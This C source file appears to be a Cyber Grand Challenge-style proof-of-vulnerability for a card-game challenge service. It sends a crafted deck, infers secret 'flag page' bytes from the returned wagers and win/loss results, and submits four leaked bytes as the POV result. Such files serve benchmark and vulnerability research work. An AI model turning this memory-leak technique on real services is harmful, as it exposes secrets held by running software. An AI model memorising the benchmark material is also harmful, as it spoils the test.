/*
 * Copyright (C) Narf Industries <info@narfindustries.com>
 *
 * Permission is hereby granted, free of charge, to any person obtaining a
 * copy of this software and associated documentation files (the "Software"),
 * to deal in the Software without restriction, including without limitation
 * the rights to use, copy, modify, merge, publish, distribute, sublicense,
 * and/or sell copies of the Software, and to permit persons to whom the
 * Software is furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included
 * in all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
 * OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
 * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
 * IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
 * CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
 * TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
 * SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
#include <libpov.h>
#include "libc.h"

// #define DEBUG 1

#define FOR_EACH_PLAYER    for (unsigned int pid = 1; pid <= PLAYER_COUNT; pid++) {

#define PLAYER_COUNT 5
#define WIN 1
#define LOSS 7
#define WIN_SHIFT 126
#define LOSS_SHIFT -77

// #ifdef DEBUG
// #define DBG(msg, len)   SEND(2, (void *)msg, len);
// #define            SEND(2, (void *)"\n", 1);
// #else
// #define DBG(msg, len)   ;
// #define            ;
// #endif

unsigned char flag_page[4096] = {0};
unsigned char fp_found_idxs[4096] = {0};
unsigned int  player_fp_idx[PLAYER_COUNT + 1] = {0};

unsigned char deal_cmd[] = "\xff\x5f\xe5\xa5\xee\x59";
unsigned char data_cmd[] = "\xde\xa4\x3c\x12\xfb\xde";
unsigned char quit_cmd[] = "\x09\x23\xd3\xa1\xf8\x51";
unsigned char deck_cmd[] = "\x21\x0a\x1e\x43\xab\x84";
unsigned int cmd_sz = sizeof(deal_cmd) - 1;

int res = 0;


unsigned int updated_fp_idx(unsigned int fp_idx, int shift) {
   int fp_idx_tmp = 0;
   unsigned int new_fp_idx = 0;

   fp_idx_tmp = fp_idx + shift;
   if (4096 <= fp_idx_tmp) {
      new_fp_idx = (unsigned int)((int)fp_idx_tmp - (int)4096);
   } else if (0 > fp_idx_tmp) {
      new_fp_idx = (unsigned int)((int)4096 + (int)fp_idx_tmp);
   } else {
      new_fp_idx = (unsigned int)fp_idx_tmp;
   }

   return new_fp_idx;
}

void process_wagers_and_results(unsigned char *deal1, unsigned int *wagers_and_results) {
   unsigned int *wagers = wagers_and_results;
   unsigned int *results = wagers_and_results + PLAYER_COUNT + 1;
   unsigned int prev_idx = 0;
   unsigned char wager = 0;
   int shift = 0;
   // DBG("Process\n");

   FOR_EACH_PLAYER
      // if wager is not on card with value 2 or 3, then save the wager as a fp byte
      wager = wagers[pid];
      if ((2 != deal1[pid]) && (3 != deal1[pid])) {
         // save fp char 
         // 1) if we do not already have a char at this idx
         //  or
         // 2) if we already have one at this idx and the new fp char is non-zero
         if ((0 == fp_found_idxs[player_fp_idx[pid]]) ||
             ( (1 == fp_found_idxs[player_fp_idx[pid]]) && (0 != wager))) {

            flag_page[player_fp_idx[pid]] = (unsigned char)wager;
            fp_found_idxs[player_fp_idx[pid]] = 1;
            DBG("p%U save fp byte %H at idx %U\n", pid, flag_page[player_fp_idx[pid]], player_fp_idx[pid]);
            if (0 == wager) {
               DBG(" wager is %U on card %U ++++++++++++++\n", wager, deal1[pid]);
            }
         }
      }

      // if WIN/LOSS update fp_idx
      if (WIN == results[pid]) {
         shift = WIN_SHIFT;
      } else {
         shift = LOSS_SHIFT;
      }
      DBG("p%U, wager %U, result %I\n", pid, wager, results[pid]);
      // fp idx shift
      prev_idx = player_fp_idx[pid];
      player_fp_idx[pid] = updated_fp_idx(player_fp_idx[pid], shift);
      DBG("p%U idx shift by %I from %U -> %U\n", pid, shift, prev_idx, player_fp_idx[pid]);
   }
}

unsigned int find_four(void) {

   unsigned int i0 = 0;
   unsigned int i1 = 1;
   unsigned int i2 = 2;
   unsigned int i3 = 3;
   DBG("do find 4\n");
   for (; i0 < sizeof(flag_page) - 4; i0 +=4, i1 += 4, i2 += 4, i3 += 4) {
      if (fp_found_idxs[i0] & fp_found_idxs[i1] & fp_found_idxs[i2] & fp_found_idxs[i3]) {

         DBG("#### 4 consecutive magic page indices found at: %U\n\n", i0);

         break;
      }
   }

   return i0;
}

void print_flag_page(void) {
   DBG("Dump flag_page:\n");
   for (unsigned int i = 0; i < sizeof(flag_page); i++) {
      DBG_PLAIN("fp[%U] = %H", i, flag_page[i]);
   }
}

void print_fp_found_idxs(void) {
   DBG("Dump fp_found_idxs:\n");
   for (unsigned int i = 0; i < sizeof(fp_found_idxs); i++) {
      DBG_PLAIN("fp_idx[%U] = %U", i, fp_found_idxs[i]);
   }
}

void print_found_fp_bytes(void) {
   DBG("Flag page bytes that were discovered:\n");
   for (unsigned int i = 0; i < sizeof(fp_found_idxs); i++) {
      if (1 == fp_found_idxs[i]) {
      DBG_PLAIN("fp[%U] = %H\n", i, flag_page[i]);         
      }
   }
}

void read_ok(void) {
   unsigned char read_buf[8] = {0};
   
   RECV(0, (char *)read_buf, sizeof(read_buf));
}

unsigned char enough_cards(unsigned int idx, unsigned int len) {
   if ((idx + PLAYER_COUNT) < len) {
      return 1;
   }
   return 0;
}

int main(void) {
   negotiate_type2();

   /* Send Deck cmd, size, deck content */
   unsigned char deck_bytes[] = 
      "\x04\x06\x04\x09\x04\x05"
      "\x05\x07\x02\x03\x0a\x07\x03\x02\x08\x09\x02\x0a\x0a\x05\x04\x06"
      "\x06\x05\x04\x08\x06\x08\x05\x05\x06\x07\x05\x06\x05\x03\x09\x02"
      "\x08\x08\x06\x04\x09\x03\x05\x09\x0a\x07\x05\x04\x05\x02\x07\x08"
      "\x09\x05\x0a\x03\x05\x03\x09\x07\x07\x0a\x04\x0a\x06\x07\x0a\x0a"
      "\x02\x02\x03\x03\x04\x03\x06\x02\x05\x04\x03\x02\x02\x04\x08\x08"
      "\x09\x08\x07\x07\x05\x0a\x09\x08\x06\x07\x08\x06\x05\x07\x09\x05"
      "\x09\x08\x04\x06\x03\x09\x09\x04\x07\x05\x03\x05\x0a\x0a\x06\x08"
      "\x09\x02\x09\x05\x0a\x0a\x0a\x02\x05\x06\x04\x07\x08\x0a\x0a\x02"
      "\x05\x03\x04\x08\x07\x08\x07\x07\x07\x02\x07\x05\x02\x03\x03\x05"
      "\x08\x09\x05\x07\x04\x05\x07\x02\x05\x03\x06\x09\x08\x07\x0a\x08"
      "\x06\x07\x05\x09\x02\x05\x02\x03\x0a\x04\x07\x02\x04\x06\x02\x08"
      "\x06\x07\x03\x08\x02\x07\x07\x07\x08\x03\x06\x0a\x09\x09\x07\x07"
      "\x07\x07\x0a\x09\x09\x04\x05\x05\x09\x02\x05\x07\x09\x08\x0a\x02"
      "\x04\x08\x0a\x0a\x0a\x03\x0a\x02\x04\x07\x08\x0a\x03\x03\x0a\x06"
      "\x03\x06\x05\x06\x09\x02\x02\x02\x07\x07\x06\x08\x05\x02\x09\x09"
      "\x0a\x07\x02\x0a\x08\x05\x05\x02\x02\x02\x09\x0a\x07\x04\x04\x03"
      "\x05\x04\x0a\x02\x05\x0a\x09\x08\x09\x05\x06\x09\x06\x08\x07\x08"
      "\x04\x04\x05\x03\x07\x03\x02\x03\x08\x04\x04\x06\x02\x09\x03\x0a"
      "\x05\x02\x09\x04\x03\x07\x03\x08\x03\x03\x08\x0a\x08\x03\x03\x03"
      "\x08\x07\x09\x03\x03\x05\x03\x09\x0a\x07\x0a\x05\x02\x0a\x07\x03"
      "\x0a\x02\x09\x06\x03\x04\x06\x0a\x02\x04\x05\x0a\x09\x07\x09\x07"
      "\x05\x03\x04\x02\x09\x04\x03\x03\x03\x08\x0a\x05\x0a\x05\x08\x02"
      "\x03\x05\x09\x07\x06\x07\x06\x08\x02\x02\x07\x04\x0a\x07\x04\x05"
      "\x0a\x05\x04\x06\x04\x06\x07\x06\x0a\x02\x05\x04\x02\x04\x0a\x02"
      "\x05\x0a\x08\x07\x02\x09\x06\x05\x08\x0a\x08\x09\x06\x04\x0a\x03"
      "\x09\x08\x0a\x02\x09\x02\x08\x06\x06\x06\x0a\x04\x05\x09\x08\x05"
      "\x09\x0a\x02\x0a\x03\x0a\x0a\x03\x06\x0a\x04\x04\x0a\x06\x07\x0a"
      "\x03\x03\x0a\x09\x04\x03\x05\x06\x08\x0a\x02\x04\x07\x07\x02\x07"
      "\x02\x02\x07\x09\x07\x07\x08\x0a\x02\x07\x08\x07\x0a\x0a\x04\x03"
      "\x02\x04\x02\x02\x04\x04\x02\x07\x03\x05\x05\x08\x07\x02\x03\x02"
      "\x09\x07\x0a\x09\x0a\x04\x07\x06\x0a\x04\x03\x09\x09\x03\x07\x02"
      "\x02\x02\x08\x06\x07\x08\x04\x08\x02\x03\x05\x07\x0a\x08\x03\x05"
      "\x02\x04\x04\x03\x08\x0a\x03\x07\x06\x03\x07\x07\x08\x08\x03\x07"
      "\x07\x03\x08\x08\x06\x02\x09\x08\x08\x09\x0a\x0a\x07\x02\x08\x07"
      "\x07\x03\x04\x08\x06\x09\x08\x07\x07\x07\x08\x0a\x04\x05\x06\x07"
      "\x06\x0a\x02\x07\x03\x04\x07\x05\x03\x06\x09\x03\x03\x02\x02\x08"
      "\x08\x06\x04\x07\x06\x07\x02\x06\x06\x04\x03\x07\x02\x06\x08\x0a"
      "\x02\x08\x04\x03\x05\x04\x0a\x09\x08\x03\x02\x09\x0a\x02\x0a\x03"
      "\x03\x07\x07\x09\x08\x02\x0a\x04\x06\x0a\x06\x04\x03\x09\x02\x05"
      "\x07\x07\x07\x03\x08\x09\x07\x04\x05\x08\x0a\x02\x03\x02\x04\x0a"
      "\x06\x0a\x0a\x08\x07\x0a\x05\x08\x05\x07\x02\x08\x06\x0a\x04\x06"
      "\x07\x06\x07\x05\x03\x0a\x05\x0a\x0a\x0a\x03\x04\x04\x06\x02\x02"
      "\x09\x05\x09\x03\x07\x06\x03\x03\x05\x05\x03\x08\x0a\x03\x08\x05"
      "\x0a\x06\x07\x06\x02\x06\x03\x05\x04\x03\x06\x07\x09\x08\x02\x02"
      "\x08\x06\x03\x03\x07\x09\x02\x05\x03\x0a\x04\x08\x03\x06\x03\x02"
      "\x09\x02\x0a\x09\x07\x04\x06\x07\x05\x09\x06\x0a\x06\x05\x05\x06"
      "\x0a\x04\x0a\x03\x0a\x07\x0a\x08\x04\x05\x07\x03\x0a\x09\x05\x02"
      "\x08\x05\x02\x02\x0a\x08\x0a\x07\x05\x02\x06\x0a\x0a\x03\x06\x03"
      "\x03\x07\x05\x04\x09\x08\x07\x05\x02\x02\x07\x04\x05\x09\x0a\x09"
      "\x08\x07\x06\x02\x08\x04\x06\x08\x04\x07\x03\x06\x07\x09\x02\x08"
      "\x0a\x0a\x05\x08\x03\x06\x06\x05\x06\x05\x05\x08\x06\x09\x04\x08"
      "\x05\x04\x04\x07\x06\x05\x02\x05\x07\x08\x03\x09\x09\x04\x0a\x06"
      "\x03\x0a\x02\x07\x07\x04\x02\x03\x09\x08\x02\x09\x03\x09\x0a\x07"
      "\x04\x06\x02\x09\x09\x02\x06\x02\x06\x02\x04\x05\x09\x06\x0a\x02"
      "\x0a\x06\x09\x02\x05\x04\x07\x04\x04\x04\x0a\x05\x0a\x05\x03\x05"
      "\x0a\x08\x05\x08\x08\x08\x0a\x0a\x09\x09\x08\x08\x03\x0a\x09\x0a"
      "\x03\x08\x07\x08\x09\x05\x02\x03\x0a\x04\x04\x08\x05\x09\x07\x05"
      "\x09\x0a\x09\x06\x08\x06\x02\x08\x0a\x05\x02\x05\x04\x08\x06\x04"
      "\x06\x0a\x06\x0a\x09\x09\x06\x09\x02\x07\x0a\x05\x09\x03\x06\x05"
      "\x07\x08\x02\x09\x08\x08\x03\x04\x04\x06\x09\x07\x07\x03\x08\x09"
      "\x07\x09\x04\x03\x06\x0a\x06\x0a\x03\x09\x0a\x05\x06\x07\x07\x02"
      "\x09\x0a\x07\x0a\x0a\x02\x0a\x05\x02\x06\x07\x07\x05\x0a\x09\x07"
      "\x0a\x02\x03\x09\x08\x05\x03\x04\x02\x06\x0a\x08\x09\x06\x0a\x06"
      "\x03\x0a\x0a\x07\x05\x09\x0a\x04\x08\x05\x09\x0a\x03\x03\x02\x07"
      "\x06\x06\x06\x05\x02\x08\x02\x04\x04\x05\x03\x04\x05\x02\x06\x06"
      "\x03\x06\x09\x0a\x04\x02\x03\x03\x07\x07\x06\x05\x03\x03\x03\x03"
      "\x0a\x02\x07\x08\x07\x04\x08\x08\x03\x03\x09\x07\x09\x06\x04\x07"
      "\x05\x05\x08\x06\x06\x07\x03\x04\x06\x02\x02\x04\x08\x09\x02\x07"
      "\x05\x09\x02\x03\x05\x04\x05\x05\x09\x05\x08\x03\x02\x09\x02\x06"
      "\x09\x09\x09\x03\x02\x03\x09\x02\x09\x0a\x07\x08\x03\x06\x08\x08"
      "\x05\x07\x02\x08\x09\x0a\x04\x03\x04\x09\x02\x08\x07\x0a\x07\x03"
      "\x02\x04\x06\x0a\x05\x07\x08\x04\x06\x07\x03\x02\x06\x09\x05\x05"
      "\x06\x04\x06\x03\x02\x05\x05\x09\x04\x02\x02\x04\x09\x03\x0a\x0a"
      "\x03\x06\x09\x06\x08\x08\x08\x07\x09\x07\x09\x06\x08\x09\x02\x04"
      "\x08\x0a\x06\x09\x03\x06\x06\x09\x05\x06\x0a\x05\x09\x09\x05\x09"
      "\x03\x06\x09\x06\x0a\x03\x05\x06\x05\x05\x05\x07\x07\x05\x02\x03"
      "\x02\x07\x04\x07\x03\x08\x05\x05\x05\x0a\x02\x02\x08\x07\x0a\x04"
      "\x09\x09\x08\x07\x06\x04\x03\x06\x08\x02\x0a\x06\x05\x07\x04\x04"
      "\x03\x0a\x09\x07\x0a\x08\x07\x03\x05\x03\x0a\x0a\x04\x02\x04\x06"
      "\x06\x09\x06\x04\x03\x0a\x08\x03\x03\x06\x02\x0a\x04\x03\x0a\x03"
      "\x09\x08\x03\x03\x0a\x07\x03\x09\x0a\x05\x04\x08\x08\x04\x04\x08"
      "\x06\x04\x05\x08\x06\x07\x04\x03\x09\x02\x08\x07\x05\x08\x09\x08"
      "\x02\x05\x04\x0a\x04\x02\x07\x05\x05\x08\x08\x08\x04\x04\x08\x0a"
      "\x02\x04\x03\x0a\x0a\x08\x08\x08\x08\x04\x05\x08\x09\x04\x05\x02"
      "\x09\x06\x07\x03\x09\x09\x09\x03\x04\x0a\x02\x05\x08\x02\x0a\x07"
      "\x0a\x08\x07\x09\x05\x08\x07\x03\x06\x09\x08\x03\x02\x03\x07\x07"
      "\x03\x02\x05\x07\x07\x06\x03\x06\x09\x07\x05\x08\x07\x06\x04\x0a"
      "\x09\x09\x04\x07\x0a\x09\x06\x02\x02\x08\x02\x0a\x03\x0a\x04\x07"
      "\x0a\x08\x0a\x07\x03\x06\x03\x04\x08\x02\x02\x03\x09\x0a\x09\x04"
      "\x03\x09\x02\x02\x03\x05\x04\x04\x08\x02\x07\x03\x05\x0a\x06\x06"
      "\x04\x07\x09\x0a\x05\x09\x09\x08\x0a\x03\x05\x09\x04\x09\x04\x07"
      "\x08\x02\x08\x09\x05\x02\x02\x08\x07\x04\x07\x03\x02\x04\x02\x05"
      "\x0a\x08\x08\x09\x02\x07\x08\x05\x08\x03\x04\x06\x0a\x05\x08\x04"
      "\x02\x07\x04\x08\x08\x0a\x05\x07\x03\x04\x03\x0a\x04\x08\x04\x05"
      "\x0a\x02\x09\x05\x05\x07\x08\x04\x02\x05\x07\x07\x09\x04\x02\x07"
      "\x07\x02\x04\x07\x09\x08\x04\x03\x0a\x03\x05\x05\x05\x09\x07\x09"
      "\x08\x06\x03\x05\x07\x04\x09\x09\x06\x0a\x03\x0a\x0a\x09\x02\x04"
      "\x06\x08\x04\x05\x03\x09\x05\x05\x03\x05\x07\x02\x0a\x0a\x02\x06"
      "\x09\x08\x05\x09\x05\x07\x06\x03\x06\x06\x05\x03\x04\x06\x0a\x06"
      "\x06\x04\x04\x04\x09\x05\x0a\x02\x04\x06\x07\x07\x05\x07\x05\x09"
      "\x04\x07\x09\x06\x09\x09\x0a\x0a\x03\x06\x03\x03\x08\x0a\x06\x05"
      "\x0a\x09\x03\x03\x08\x03\x02\x02\x08\x02\x0a\x09\x04\x06\x02\x08"
      "\x06\x06\x03\x09\x04\x02\x0a\x02\x03\x08\x05\x04\x0a\x03\x03\x03"
      "\x09\x09\x06\x05\x07\x07\x08\x05\x03\x02\x03\x04\x02\x03\x0a\x09"
      "\x09\x04\x07\x08\x02\x02\x05\x09\x03\x0a\x06\x04\x07\x08\x02\x06"
      "\x09\x07\x02\x0a\x03\x03\x07\x08\x05\x08\x02\x08\x04\x05\x04\x09"
      "\x08\x08\x08\x02\x08\x06\x03\x0a\x07\x09\x07\x09\x06\x04\x02\x09"
      "\x05\x0a\x02\x09\x0a\x02\x0a\x02\x09\x0a\x03\x03\x06\x09\x02\x03"
      "\x02\x07\x07\x07\x02\x07\x06\x06\x08\x09\x07\x07\x09\x0a\x08\x06"
      "\x09\x07\x06\x02\x04\x09\x03\x04\x03\x04\x06\x0a\x09\x02\x03\x03"
      "\x07\x07\x09\x02\x07\x07\x06\x09\x09\x05\x03\x0a\x03\x0a\x05\x07"
      "\x09\x04\x06\x06\x07\x0a\x09\x03\x03\x06\x08\x04\x08\x07\x09\x02"
      "\x09\x09\x05\x02\x04\x02\x0a\x08\x06\x0a\x0a\x09\x0a\x06\x05\x0a"
      "\x02\x06\x02\x05\x04\x09\x04\x04\x06\x04\x05\x08\x07\x05\x07\x02"
      "\x04\x0a\x05\x0a\x07\x07\x09\x03\x02\x06\x08\x0a\x02\x05\x0a\x08"
      "\x0a\x09\x0a\x0a\x08\x02\x02\x04\x03\x06\x03\x09\x06\x0a\x02\x03"
      "\x06\x05\x03\x07\x03\x02\x03\x04\x0a\x04\x02\x06\x04\x03\x08\x09"
      "\x08\x08\x04\x08\x06\x05\x09\x09\x0a\x0a\x08\x03\x0a\x02\x04\x04"
      "\x05\x04\x09\x02\x03\x05\x08\x02\x05\x08\x03\x0a\x07\x07\x02\x08"
      "\x02\x02\x03\x0a\x09\x08\x03\x08\x05\x04\x02\x05\x07\x04\x0a\x04"
      "\x06\x02\x06\x08\x08\x08\x0a\x03\x05\x05\x02\x08\x08\x09\x09\x09"
      "\x05\x02\x05\x02\x02\x09\x06\x04\x07\x05\x05\x0a\x04\x06\x07\x08"
      "\x0a\x02\x09\x0a\x03\x07\x0a\x08\x0a\x04\x09\x09\x02\x04\x06\x08"
      "\x09\x05\x06\x03\x02\x06\x08\x06\x02\x02\x07\x07\x08\x02\x06\x04"
      "\x02\x08\x03\x02\x04\x05\x05\x09\x09\x03\x08\x0a\x09\x07\x08\x0a"
      "\x03\x07\x06\x03\x02\x05\x09\x08\x05\x02\x09\x07\x0a\x07\x0a\x08"
      "\x0a\x07\x07\x04\x0a\x02\x05\x04\x06\x03\x07\x03\x03\x04\x06\x05"
      "\x04\x04\x0a\x03\x08\x0a\x0a\x07\x03\x04\x08\x07\x09\x06\x04\x03"
      "\x09\x07\x06\x02\x03\x04\x03\x02\x08\x06\x07\x06\x03\x04\x0a\x09"
      "\x05\x09\x05\x06\x0a\x08\x02\x06\x09\x07\x07\x03\x06\x06\x06\x07"
      "\x06\x06\x03\x04\x04\x07\x0a\x02\x08\x09\x07\x08\x08\x03\x08\x09"
      "\x0a\x03\x09\x02\x08\x02\x08\x03\x0a\x02\x03\x05\x04\x05\x02\x05"
      "\x04\x09\x05\x09\x02\x08\x03\x03\x09\x02\x07\x02\x05\x0a\x02\x08"
      "\x07\x0a\x08\x05\x04\x03\x03\x02\x07\x02\x04\x09\x03\x06\x03\x06"
      "\x07\x09\x03\x07\x09\x02\x02\x02\x04\x06\x06\x07\x02\x08\x02\x02"
      "\x05\x08\x03\x03\x06\x0a\x06\x07\x08\x09\x07\x03\x09\x09\x06\x0a"
      "\x04\x02\x04\x05\x07\x07\x02\x07\x08\x03\x04\x03\x03\x05\x05\x08"
      "\x07\x05\x06\x0a\x04\x05\x09\x0a\x02\x08\x08\x05\x02\x06\x0a\x02"
      "\x09\x05\x02\x02\x07\x03\x03\x0a\x02\x09\x09\x03\x06\x07\x03\x03"
      "\x02\x04\x04\x0a\x09\x07\x07\x03\x0a\x03\x04\x03\x03\x06\x06\x06"
      "\x04\x02\x03\x06\x04\x05\x0a\x09\x0a\x08\x09\x05\x0a\x04\x06\x03"
      "\x05\x09\x08\x05\x03\x03\x02\x08\x09\x03\x05\x03\x09\x0a\x07\x05"
      "\x02\x0a\x05\x0a\x06\x09\x09\x04\x09\x0a\x06\x03\x06\x04\x02\x02"
      "\x04\x09\x02\x02\x07\x09\x08\x07\x09\x06\x09\x08\x07\x05\x05\x04"
      "\x02\x05\x08\x07\x0a\x04\x06\x07\x09\x07\x04\x05\x03\x03\x02\x06"
      "\x03\x08\x05\x06\x0a\x04\x05\x09\x05\x0a\x04\x08\x09\x05\x0a\x09"
      "\x08\x02\x06\x08\x08\x08\x05\x08\x09\x05\x08\x07\x05\x08\x04\x02"
      "\x02\x08\x03\x06\x02\x04\x05\x04\x04\x03\x08\x0a\x0a\x09\x03\x02"
      "\x05\x02\x07\x03\x02\x0a\x03\x05\x06\x08\x03\x07\x06\x03\x09\x04"
      "\x03\x04\x05\x0a\x04\x09\x08\x09\x03\x05\x08\x07\x06\x03\x05\x02"
      "\x0a\x04\x0a\x08\x09\x06\x05\x07\x02\x09\x09\x03\x07\x04\x07\x0a"
      "\x0a\x07\x0a\x02\x08\x03\x07\x06\x08\x05\x02\x07\x09\x05\x02\x03"
      "\x02\x06\x06\x08\x0a\x04\x09\x02\x02\x07\x06\x07\x06\x05\x08\x06"
      "\x0a\x05\x04\x08\x06\x04\x06\x02\x09\x06\x08\x02\x06\x07\x03\x06"
      "\x02\x03\x09\x05\x06\x04\x02\x08\x09\x02\x06\x08\x08\x0a\x0a\x04"
      "\x02\x0a\x02\x08\x05\x06\x03\x04\x04\x08\x0a\x06\x03\x05\x05\x03"
      "\x08\x07\x08\x04\x04\x08\x07\x05\x02\x03\x09\x0a\x04\x09\x09\x06"
      "\x04\x04\x05\x09\x04\x02\x03\x04\x08\x04\x04\x03\x03\x02\x08\x09"
      "\x07\x06\x0a\x02\x03\x07\x02\x05\x02\x07\x08\x04\x02\x04\x06\x05"
      "\x07\x05\x03\x08\x07\x07\x09\x09\x0a\x07\x08\x02\x07\x07\x03\x05"
      "\x04\x0a\x0a\x06\x03\x06\x07\x04\x09\x0a\x06\x0a\x09\x0a\x07\x04"
      "\x03\x07\x04\x04\x0a\x07\x02\x02\x03\x02\x08\x07\x09\x07\x04\x07"
      "\x05\x0a\x09\x05\x07\x03\x07\x03\x05\x02\x06\x08\x08\x06\x07\x04"
      "\x06\x08\x04\x09\x03\x09\x05\x05\x05\x07\x03\x0a\x09\x0a\x05\x04"
      "\x06\x08\x08\x02\x04\x09\x04\x06\x04\x08\x02\x05\x02\x09\x08\x0a"
      "\x03\x06\x04\x05\x05\x02\x03\x0a\x0a\x02\x05\x04\x07\x03\x0a\x05"
      "\x07\x04\x0a\x04\x06\x04\x0a\x05\x05\x02\x08\x04\x08\x08\x05\x05"
      "\x05\x08\x09\x0a\x06\x06\x09\x03\x0a\x06\x03\x07\x09\x04\x07\x04"
      "\x03\x03\x08\x08\x08\x06";

   unsigned int deck_bytes_size = sizeof(deck_bytes) - 1;

   SEND(1, (char *)deck_cmd, cmd_sz);
   SEND(1, (char *)&deck_bytes_size, 4);
   SEND(1, (char *)deck_bytes, deck_bytes_size);
   read_ok();

   unsigned int  card_idx = 0;
   unsigned char *deal1 = &deck_bytes[0];
   unsigned int  wagers_and_results[2 * (PLAYER_COUNT + 1)] = {0};

   while (enough_cards(card_idx, deck_bytes_size)) {
      /* Deal cmd */
      SEND(1, (char *)deal_cmd, cmd_sz);
      read_ok();

      /* Send round data cmd and read wagers + results */
      SEND(1, (char *)data_cmd, cmd_sz);

      RECV(0, (char *)wagers_and_results, sizeof(wagers_and_results));

      process_wagers_and_results(deal1, wagers_and_results);

      read_ok();

      // if (0 != card_idx) break;
      card_idx += (PLAYER_COUNT * 2);
      deal1 = &deck_bytes[card_idx];
   }

   /* Quit */
   SEND(1, (char *)quit_cmd, cmd_sz);
   read_ok();

   unsigned int fp_idx_four = find_four();
   print_found_fp_bytes();
   DBG("i0: %U, flag: %H %H %H %H\n", fp_idx_four, flag_page[fp_idx_four], flag_page[fp_idx_four+1], flag_page[fp_idx_four+2], flag_page[fp_idx_four+3]);

   //*** submitting type 2 POV results
   type2_submit(&flag_page[fp_idx_four], 4);
}
